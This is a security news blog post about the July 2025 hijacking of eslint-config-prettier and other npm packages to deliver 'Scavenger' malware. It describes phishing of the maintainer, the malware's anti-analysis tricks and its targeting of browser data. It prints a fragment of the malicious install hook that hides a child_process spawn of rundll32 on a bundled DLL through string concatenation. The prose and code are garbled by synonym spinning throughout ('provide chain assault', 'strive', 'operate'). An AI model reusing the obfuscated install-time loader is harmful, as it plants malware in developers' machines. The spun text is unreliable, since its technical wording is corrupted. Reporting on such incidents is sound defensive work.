Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Scavenger Malware Hijacks Popular npm Packages to Attack Developers

Posted on July 23, 2025July 23, 2025 By CWS

A complicated provide chain assault concentrating on JavaScript builders emerged on Friday, July 18th, 2025, when cybercriminals compromised a number of common npm packages to distribute the newly recognized “Scavenger” malware.

The assault primarily centered on eslint-config-prettier, a widely-used code formatting package deal, together with a number of different growth instruments together with eslint-plugin-prettier, snyckit, @pkgr/core, and napi-postinstall.

The compromise was found when GitHub customers reported suspicious releases of eslint-config-prettier that appeared within the npm registry regardless of no corresponding code adjustments being mirrored within the venture’s GitHub repository.

Phishing E mail Acquired by NPM Package deal Maintainer (Supply – Humpty’s RE Weblog)

The package deal maintainer later confirmed their npm account had been compromised by means of a phishing e-mail marketing campaign, permitting attackers to publish malicious variations throughout a number of package deal variations together with 8.10.1, 9.1.1, 10.1.6, and 10.1.7.

Humpty’s RE weblog recognized the malware household as “Scavenger” as a result of a number of references to the strings “SCVNGR” and “Scavenger” discovered all through the malware variants.

The assault represents a big escalation in provide chain threats, because it particularly targets the developer ecosystem by means of trusted growth instruments which are routinely put in in JavaScript initiatives worldwide.

The malware’s impression extends past typical info stealing, because it particularly targets Chromium-based browsers and their related information shops, together with Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Hyperlinks.

This concentrating on suggests the attackers are notably eager about harvesting developer credentials, session tokens, and looking patterns from software program growth professionals who generally use these instruments.

An infection Mechanism and Code Execution

The Scavenger malware employs a classy an infection vector by means of the compromised eslint-config-prettier package deal.

Upon set up, the malicious package deal executes an set up.js file containing a deceptively named logDiskSpace() operate that serves because the preliminary payload supply mechanism.

String decryption routine (Supply – Humpty’s RE Weblog)

The operate contains intentionally obfuscated JavaScript code that checks for Home windows techniques earlier than executing the malicious payload:-

operate logDiskSpace() {
strive {
if(os.platform() == ‘win32’) {
const tempDir = os.tmpdir();
require(‘chi’+’ld_pro’+’cess’)[“sp”+”awn”]
(“rund”+”ll32”,
[path.join(__dirname, ‘./node-gyp’ + ‘.dll’) +
“,main”]);

This code fragment demonstrates the attackers’ use of string concatenation to evade static evaluation instruments whereas executing a bundled DLL file named node-gyp.dll utilizing Home windows’ rundll32.exe utility.

The malware loader, compiled on the identical day because the assault (2025-07-18 08:59:38 UTC), incorporates a number of anti-analysis strategies together with VM detection by means of SMBIOS firmware desk enumeration and course of house scanning for safety instruments like Avast, Sandboxie, and Comodo Antivirus.

The malware makes use of XXTEA block cipher encryption with a particular DELTA worth of 0x9e3779b9 for command and management communications, establishing preliminary contact by means of base64-encoded responses from compromised infrastructure.

Increase detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Attempt ANY.RUN Now

Cyber Security News Tags:Attack, Developers, Hijacks, Malware, NPM, Packages, Popular, Scavenger

Post navigation

Previous Post: How to Recognize Deepfake Videos
Next Post: Researchers Unmasked Russia’s Most Secretive FSB’s Spy Network

Related Posts

New FrigidStealer Malware Attacking macOS Users to Steal Login Credentials Cyber Security News
OpenAI is to Launch a AI Web Browser in Coming Weeks Cyber Security News
Gunra Ransomware New Linux Variant Runs Up To 100 Encryption Threads With New Partial Encryption Feature Cyber Security News
New TinyLoader Malware Attacking Windows Users Via Network Shares and Fake Shortcuts Files Cyber Security News
Apache bRPC Vulnerability Allows Attackers to Crash the Service via Network Cyber Security News
Threat Actors Leverages DeepSeek-R1 Popularity to Attack Users Running Windows Devices Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Use End-to-End Encrypted Email
  • Palo Alto Networks, Zscaler, Jaguar Land Rover, and Cyber Attacks
  • How to Use Email Aliases for Privacy
  • 10 Best Cloud Penetration Testing Companies in 2025
  • 10 Best AI penetration Testing Companies in 2025

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Use End-to-End Encrypted Email
  • Palo Alto Networks, Zscaler, Jaguar Land Rover, and Cyber Attacks
  • How to Use Email Aliases for Privacy
  • 10 Best Cloud Penetration Testing Companies in 2025
  • 10 Best AI penetration Testing Companies in 2025

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News